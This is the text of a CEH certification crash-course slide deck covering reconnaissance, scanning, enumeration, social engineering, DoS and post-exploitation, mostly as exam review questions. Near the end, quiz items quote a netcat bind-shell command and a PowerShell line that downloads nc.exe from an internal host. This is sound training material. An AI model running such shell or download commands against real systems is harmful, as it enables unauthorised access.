Certified Ethical Hacker (CEH)

Certification Crash Course

(Day 1)

Omar Santos
@santosomar
DAY 1

Introduction to Ethical Hacking and to the CEH exam

Foot-printing, Enumeration, Reconnaissance, and Network Scanning

Vulnerability Analysis and System Hacking

Social Engineering

Denial-of-Service

Session Hijacking, Evading IDS, IPS, Firewalls, and Honeypots

DAY 2

Cryptography

Hacking Wireless Networks

Hacking Web Servers and Web Applications

Hacking Mobile Platforms

IoT Hacking

Cloud Computing
 Resources:
CEH Review: https://cehreview.com
The Art of Hacking: https://theartofhacking.org
GitHub: https://h4cker.org/github
https://learning.oreilly.com/certifications/9780136758433/
 DISCLAIMER | WARNING

The information provided on this training is for educational purposes only. The author, O’Reilly,
or any other entity is in no way responsible for any misuse of the information.

Some of the tools and technologies that you will learn in this training class may be illegal
depending on where you reside. Please check with your local laws.

Please practice and use all the tools that are shown in this training in a lab that is not connected
to the Internet or any other network.
What this class is and is not…

• This is a review class of the CEH exam.

• This training helps you prepare for the test; it does not
guarantee that you will pass.
• We will cover all major topics covered in the CEH exam.
You still need to practice, study, and learn from other
resources.
POLL QUESTION

How long have you been performing security penetration testing (ethical hacking)?
• Just started
• Less than a year
• 1-2 years
• 3 years or more
• I have never done pen testing. I am just curious about this training.
POLL QUESTION

How are you preparing for the CEH exam?

• Books only
• Safari Video Courses
• Only this live training course
• Other courses
• I am not studying for the CEH exam.
Introduction to Ethical Hacking
and to the CEH Exam
 EC-Council CEH Exam

• Number of Questions: 125

• Test Duration: 4 Hours
• Test Format: Multiple Choice
• Test Delivery: ECC EXAM, VUE
• Exam Prefix: 312-50 (ECC EXAM), 312-50 (VUE)

https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
 EC-Council CEH Exam Collateral

• Exam Brochure:
https://www.eccouncil.org/wp-content/uploads/2016/07/CEHv10-Brochure.pdf

• CEH Candidate Handbook:

https://s3-us-west-2.amazonaws.com/edm-image/documents/CEH-Handbook-v2.2.pdf

• Blueprint: https://cert.eccouncil.org/certified-ethical-hacker.html

• FAQ: https://cert.eccouncil.org/faq.html

https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
CEH (ANSI) vs CEH Practical
Before we get started with Ethical Hacking…
A few concepts that you must be familiar with (in the forms
of review questions)…
What is the CIA Triad?

a) Confidentiality, Integrity, Assurance

b) Confidentiality, Integrity, Availability
c) Compromise, Integrity, Assurance
d) Compromise, Information, Availability
e) None of the above
What is the CIA Triad?

Confidentiality

Integrity Availability
Which of the following ensures that data is received without
modification?

a) Integrity
b) Availability
c) Authentication
d) Authorization
e) Confidentiality
Which of the following attacks leverages built-in code and
scripts within off-the-shelf applications?

a)Privilege escalation
b)Heap attacks
c) Shrink-wrap
d)Cross-site scripting
Which of the following describes an attacker that is
motivated by political believes?

a) Script kiddie
b) Hacktivist
c) Gray hat hacker
d) Black hat hacker
Which of the following best describes when the tester does not
have any prior knowledge of the systems being tested?

a)White box testing

b)Black box testing
c) Gray box testing
Which of the following are laws that are related to Ethical
Hacking?

a) 18 U.S.C § 1029 and 1030

b) The SPY Act
c) Freedom of Information Act (5 U.S.C. § 552) and the Privacy Act of 1974
d) None of the above
e) All of the above
 Which of the following are Penetration Testing Methodologies?

a) Penetration Testing Execution Standard

b) OWASP Testing Guide
c) NIST 800-115: Technical Guide to Information Security Testing and Assessment
d) Open Source Security Testing Methodology Manual (OSSTMM)
e) Common Vulnerability Scoring System (CVSS)
f) A and E
g) A, B, and E
h) A, B, C, and D
 Become Familiar with Penetration Testing Methodologies

• Penetration Testing Execution Standard:

http://www.pentest-standard.org

• OWASP Testing Guide:

https://www.owasp.org/index.php/OWASP_Testing_Project

• NIST 800-115: Technical Guide to Information Security Testing and Assessment:

http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf

• Open Source Security Testing Methodology Manual (OSSTMM):

http://www.isecom.org/research
PEN TESTING LIFECYCLE
ENGAGEMENT

Pre-engagement
PRE-

Start interactions and

scoping
DURING

Intelligence Threat Vulnerability Post-

Exploitation
Gathering Modeling Analysis Exploitation
AFTER

Report End

Aligned with: http://www.pentest-standard.org

EC Council System Hacking Methodology
EC Council System Hacking Methodology

Vulnerability
Foot-printing Scanning Enumeration
Analysis

Gaining Access: Maintaining Access:

Clearing Logs and
Cracking Passwords, Executing Applications, Covering Tracks
Elevating Privileges, etc. Hiding Files, etc.
Additional References of Safari Content Related to this Section

Penetration Testing Methodologies:

https://cehreview.com/go/methodologies

Attack types:
https://cehreview.com/go/attack_types
https://cehreview.com/go/attack_types2

Legal aspects of penetration testing:

https://cehreview.com/go/legal
Foot-printing, Enumeration, Reconnaissance,
and Network Scanning
Active vs. Passive Recon (Foot-printing)
 Passive Recon

• Search Engines (check out and play with Google Hacking DB

https://www.exploit-db.com/google-hacking-database/)
• Web Services
• Certificate information
• Social networks, Groups, Forums, Blogs, etc.
• Email, PGP public key servers, etc.
• Competitive Intelligence
• WHOIS (what about GDPR impact?)
• DNS
• Shodan (https://shodan.io)
• CEH mixes social engineering in Foot-printing ¯\_(ツ)_/¯
• OSINT <-- what is it?
Tools for Passive Recon

• Maltego
• Recon-NG
• Spider Foot
• The Harvester
• Discover
• OWASP Amass
 Additional References for Passive Recon

qRecorded demos and detailed explanations:

https://cehreview.com/go/passive_recon

q Passive Recon and OSINT resources:

https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/osint
What is Active Recon?

“Actively” performing a network or vulnerability scan and launching other tools

against the victim.

Examples:
Scanners: Nmap, Nessus, Qualys, Nexpose, Retina

Fuzzing (in some cases)

Scanning

qNetwork Scanning Concepts

qScanning Tools
qScanning Techniques
qBanner Grabbing
qCreating Threat Models and Network Diagrams
qOpen Source and Vulnerability Scanners
Whiteboard
Explanation
Nmap – and other scanners
Using Python Scanning Modules
Hping3
 Enumeration of User Accounts and Gathering Other Information

• PsExec – executes processes remotely

• PsFile – shows files opened remotely
• PsGetSid – get SID or a computer or users
• PsKill – Kill processes
• PsList – detailed process info
• PsInfo – list information about a system
• PsLoggedOn– see who’s logged on
• PsLogList – dump event log records
• PsPasswd – changes account password
• PsShutdown – shutdowns or reboots system

https://github.com/The-Art-of-Hacking/art-of-hacking/blob/master/cheat_sheets/PowerShellCheatSheet_v41.pdf
 SNMP

• The Simple Network Management Protocol (SNMP) is a protocol used by many

individuals and organizations to manage network devices.
• SNMP uses UDP port 161.
• In SNMP implementations, every network device contains an SNMP agent that
connects with an independent SNMP server (also known as the SNMP manager).
• An administrator can use SNMP to obtain health information and the configuration of a
networking device, to change the configuration, and to perform other administrative
tasks.
• As you can see, this is very attractive to attackers, because they can leverage SNMP
vulnerabilities to perform similar actions in a malicious way.
SNMP Enumeration
 Which of the following describe one of the differences
between SNMPv2c and SNMPv3?
a) SNMPv2c uses two authenticating credentials: the first is a public key to view the configuration or to obtain health
status of the device, and the second is a private key to configure the managed device. SNMPv3 uses three credentials
including a certificate.

b) SNMPv3 uses two authenticating credentials: the first is a public key to view the configuration or to obtain health
status of the device, and the second is a private key to configure the managed device. SNMPv2c uses three credentials
including a certificate.

c) SNMPv2c uses certificates for authentication or a pre-shared key. SNMPv3 authenticate SNMP users using usernames
and passwords.

d) SNMPv2c uses two authenticating credentials: the first is a public community string to view the configuration or to
obtain health status of the device, and the second is a private community string to configure the managed device.
SNMPv3 authenticate SNMP users using usernames and passwords and can protect confidentiality. SNMPv2 does not
provide any confidentiality protection.
Nmap SNMP Scripts
root@kali:/usr/share/nmap/scripts# ls -1 snmp*
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nse
root@kali:/usr/share/nmap/scripts#
Other Enumeration You Should Become Familiar With…

• LDAP Enumeration
• NTP Enumeration
• NETBIOS/SMB Enumeration
enum4linux
IP Scanner
http://10base-t.com
Fing
Additional Mobile Scanning Tools

qHackode
qzANTI
qcSploit
qFaceNiff
qPortDroid
qPamn IP Scanner
 Additional References for Active Recon

qRecorded demos and detailed explanations:

https://cehreview.com/go/active_recon

q CHEAT Sheets:
https://cehreview.com/go/cheat
What does the following command do?

# hping3 -S theartofhacking.org –p 80
What does the following command do?

# nmap –sC web.h4cker.org –p 80-6669

What does the following command do?

# nmap –F portal.h4cker.org
Which of the following is not an open source scanner?
(Select all that apply)

a)Retina
b)Nmap
c)Qualys
d)Nexpose
Which of the following tools is primarily used to enumerate
domain information?

a)DNSRecon
b)Nmap
c) Metasploit
d)Nikto
When running an Nmap SYN scan, what will the Nmap result be if
ports on the target device do not respond?

a) Open

b) Closed

c) Filtered

d) Listening
Which of the following Nmap options would you use to
perform a TCP connect scan?

a)-sF
b)-sU
c)-sT
d)-sS
Which method of information gathering uses publicly
available information sources to collect and analyze
information about a target?

a) Open Source Intelligence

b) Vulnerability Scanning

c) Port Scanning

d) Packet Crafting
Which type of vulnerability scan would require the scanner
to login to the target system and run privileged level
commands to gather results ?

a) Discovery scan

b) Unauthenticated scan

c) Authenticated scan

d) Web scan
Vulnerability Analysis and System Hacking
Things that you should know…

qVulnerability Research and Classification

qVulnerability Assessment and Tools
qVulnerability Management Lifecycle
qApproaches of Vulnerability Assessment Solutions
qVulnerability Scoring Systems
Tell me more…

• Public Exploits and Known Vulnerabilities

• Scanners
• Default Passwords
Exploit DB and Searchsploit Demo
OWASP
TOP 10

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Whiteboard
Explanation
Things that you should know…

qVulnerability Research and Classification

qVulnerability Assessment and Tools
qVulnerability Management Lifecycle
qApproaches of Vulnerability Assessment Solutions
qVulnerability Scoring Systems
Whiteboard
Explanation
Things that you should know…

qVulnerability Research and Classification

qVulnerability Assessment and Tools
qVulnerability Management Lifecycle
qApproaches of Vulnerability Assessment Solutions
qVulnerability Scoring Systems
Passwords
DEMO – CRACKING PASSWORDS
Things that you should know…

qVulnerability Research and Classification

qVulnerability Assessment and Tools
qVulnerability Management Lifecycle
qApproaches of Vulnerability Assessment Solutions
qVulnerability Scoring Systems
Whiteboard
Explanation
Things that you should know…

qVulnerability Research and Classification

qVulnerability Assessment and Tools
qVulnerability Management Lifecycle
qApproaches of Vulnerability Assessment Solutions
qVulnerability Scoring Systems
Common Vulnerability Scoring System

first.org/cvss
Product vs. Services Based Vulnerability Assessment

Products VS Services
OpenVAS

http://www.openvas.org/
Remember the EC Council’s Definition of System Hacking
¯\_(ツ)_/¯

“The process of gaining access, escalating

privileges, maintaining control, and covering
tracks.”
What TCP port may indicate a Windows system? (tricky question)

a)41
b)8080
c)445
d)25
What is a Tree Based Assessment Approach?

a) The pen tester uses different strategies for each system and component (i.e.,
different scanners, tools)

b) The pen tester uses the same strategies for each system

c) The pen tester develops a tree-like vulnerability report

d) The pen tester develops a tree-based threat model

Social Engineering
A few questions before getting started with Social Engineering…
Which of the following is when the attacker presents a link
or an attachment that looks like a valid, trusted resource to
a user?
a) Email exploitation
b) Phishing
c) Elicitation
d) Pretexting
Which of the following is not true about Pharming?

a) Pharming can be done by altering the host file on a victim’s system

b) Threat actors performing a pharming attack can leverage DNS poisoning

and exploit DNS-based vulnerabilities.

c) In a pharming attack a threat actor redirects a victim from a valid

website or resource to a malicious one that could be made to appear as
the valid site to the user.

d) Pharming can be done by exploiting a buffer overflow using the

Windows PowerShell
Which of the following refers to the act of incorporating malicious
ads on trusted websites, which results in users' browsers being
inadvertently redirected to sites hosting malware?

a) Malvertising
b) Pharming
c) Active Ad Exploitation
d) Whaling
Which of the following is true about Spear Phishing?

a) Spear phishing attacks use the Windows Administrative Center.

b) Spear phishing are phishing attempts that are constructed in a very specific way
and directly targeted to specific individuals or companies.

c) Spear phishing, Whaling, and Phishing are the same type of attack.

d) Spear phishing attacks use the Windows PowerShell

 Which of the following is not true about Whaling?

a) Whaling is similar to phishing and spear phishing; however, the attack is targeted
at high-profile business executives and key individuals within a corporation.

b) Whaling is similar to phishing and spear phishing; however, the attack is targeted
at critical systems and cloud services.

c) Whaling is not similar to phishing and spear phishing.

d) Whaling is similar to command injection attacks; however, the attack is targeted

at critical systems and cloud services.
Which of the following is true about interrogation?

a) The interrogation should not take longer than 5 minutes.

b) The victim takes close attention of your gestures, but you should not pay
attention to their posture or body language.

c) If you are carrying over an interrogation, you should pay attention to the
victim’s posture, body language, color of the skin, and eye movement.

d) It is illegal to pay attention to the victim’s posture, body language, color of the
skin, and eye movement during an interrogation.
So what is social engineering?

• Social engineering attacks leverage the weakest link, which is the human user.
• If the attacker can get the user to reveal information, it is much easier for the
attacker to cause harm rather than using some other method of reconnaissance.
• This could be done through email or misdirection of web pages, which results in
the user clicking something that leads to the attacker gaining information. Social
engineering can also be done in person by an insider or outside entity or over the
phone.
Denial-of-Service
 • DDoS attacks can generally be
divided into the following three
Denial-of- categories:
service (DoS)
and distributed • Direct DDoS attacks
• Reflected
DoS (DDoS) • Amplification DDoS attacks
Direct DDoS
attacks
Botnets
Reflected
DoS
 An amplification attack is a form of reflected
attack in which the response traffic (sent by
Amplification the unwitting participant) is made up of
packets that are much larger than those that
Attacks were initially sent by the attacker (spoofing
the victim).
Session Hijacking, Evading IDS, IPS, Firewalls,
and Honeypots (and more – I want for you to
learn beyond CEH)…
 Evasion Encryption & Obfuscation
Demo Using the Eternalblue
Techniques Exploit
Pivoting Whiteboard Explanation
 egressbuster & just a simple
Exfil letmeout script…
Which of the following are post exploitation activities to
maintain persistence in a compromised system?

a) Creating and manipulating scheduled jobs and tasks

b) Creating custom daemons and processes
c) Creating new users
d) All of the above
 Which of the following describes what the
nc -lvp 2233 -e /bin/bash command does?

a) The netcat utility is used to create a bind shell on the victim system and to execute
the bash shell.

b) The netcat utility is used to create a reverse shell on the victim system and to
execute the bash shell.

c) The netcat utility is used to create a reverse shell on the victim system and to
exclude the bash shell from being executed.

d) The netcat utility is used to create a reverse shell on the attacking system and to
exclude the bash shell from being executed.
Which of the following command creates a listener on a
system on port 8899?

a) nc -nv 8899

b) nl -cp 8899

c) nc host 10.1.1.1 port 8899

d) nc -lvp 8899
Which of the following is NOT a legitimate Windows tools
can be used for post-exploitation tasks?

a) PowerShell

b) PowerSploit

c) PSExec

d) WMI
(New-ObjectSystem.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe")

What is the code above doing?

Which of the following is typically not used as a post-
exploitation tool?

a) SET

b) Mimikatz

c) PowerSploit

d) Empire
What are false positives, false negatives, true positives,
true negatives?
File-less Malware

• File-less malware does not leverage traditional executable

files.
• Living-off-the-land is when attackers use legitimate tools for
malicious purposes, and has been around for at least twenty
five years.
• PowerShell, Windows Management Instrumentation (WMI),
Python, Bash, .NET, malicious macros, etc.
• Used for lateral movement, privilege escalation, recon,
enumeration, and evasion.
 Thank you!
See you tomorrow…
Don’t forget to check out your other resources:

• Ethical Hacking Video on Demand: https://theartofhacking.org

• Other Cybersecurity Live Training: https://theartofhacking.org/training
• Additional Resources: https://theartofhacking.org/resources